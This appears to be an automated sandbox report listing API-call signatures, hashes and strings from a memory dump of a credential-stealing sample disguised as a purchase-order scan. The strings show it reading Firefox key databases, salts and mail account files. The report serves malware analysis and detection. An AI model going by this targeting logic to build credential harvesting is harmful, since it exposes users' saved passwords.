                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: strlen$_mbscat_mbscpymemset
                                                                                • String ID: key3.db$key4.db
                                                                                • API String ID: 581844971-3557030128
                                                                                • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                • String ID: 0$6
                                                                                • API String ID: 2300387033-3849865405
                                                                                • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004076D7
                                                                                • sprintf.MSVCRT ref: 00407704
                                                                                • strlen.MSVCRT ref: 00407710
                                                                                • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                • strlen.MSVCRT ref: 00407733
                                                                                • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpystrlen$memsetsprintf
                                                                                • String ID: %s (%s)
                                                                                • API String ID: 3756086014-1363028141
                                                                                • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                APIs
                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                Strings
                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                • API String ID: 1640410171-3316789007
                                                                                • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _mbscat$memsetsprintf
                                                                                • String ID: %2.2X
                                                                                • API String ID: 125969286-791839006
                                                                                • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                APIs
                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                • String ID: ACD
                                                                                • API String ID: 1886237854-620537770
                                                                                • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                APIs
                                                                                • memset.MSVCRT ref: 004091EC
                                                                                • sprintf.MSVCRT ref: 00409201
                                                                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                • String ID: caption$dialog_%d
                                                                                • API String ID: 2923679083-4161923789
                                                                                • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                Strings
                                                                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                • no such savepoint: %s, xrefs: 00426A02
                                                                                • abort due to ROLLBACK, xrefs: 00428781
                                                                                • unknown error, xrefs: 004277B2
                                                                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                • API String ID: 3510742995-3035234601
                                                                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                • API String ID: 2221118986-3608744896
                                                                                • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                APIs
                                                                                • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                  • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmpmemcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                • API String ID: 1784268899-4153596280
                                                                                • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                • memset.MSVCRT ref: 00410246
                                                                                • memset.MSVCRT ref: 00410258
                                                                                  • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                • memset.MSVCRT ref: 0041033F
                                                                                • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                • String ID:
                                                                                • API String ID: 3974772901-0
                                                                                • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                APIs
                                                                                • wcslen.MSVCRT ref: 0044406C
                                                                                • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                  • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                • strlen.MSVCRT ref: 004440D1
                                                                                  • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                  • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                • String ID:
                                                                                • API String ID: 577244452-0
                                                                                • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                APIs
                                                                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                • _strcmpi.MSVCRT ref: 00404518
                                                                                • _strcmpi.MSVCRT ref: 00404536
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: _strcmpi$memcpystrlen
                                                                                • String ID: imap$pop3$smtp
                                                                                • API String ID: 2025310588-821077329
                                                                                • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C02D
                                                                                  • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                  • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75920A60), ref: 00408EBE
                                                                                  • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75920A60), ref: 00408E31
                                                                                  • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                  • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                  • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                  • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                  • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                  • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                • API String ID: 2726666094-3614832568
                                                                                • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403A88
                                                                                • memset.MSVCRT ref: 00403AA1
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                • strlen.MSVCRT ref: 00403AE9
                                                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                • String ID:
                                                                                • API String ID: 1786725549-0
                                                                                • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                APIs
                                                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                • String ID:
                                                                                • API String ID: 2014771361-0
                                                                                • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                APIs
                                                                                • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                  • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                  • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2735961745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.2735961745.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2735961745.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_400000_scan_241205-801_draft_PO.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp$memcpy
                                                                                • String ID: global-salt$password-check
                                                                                • API String ID: 231171946-3927197501
                                                                                • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
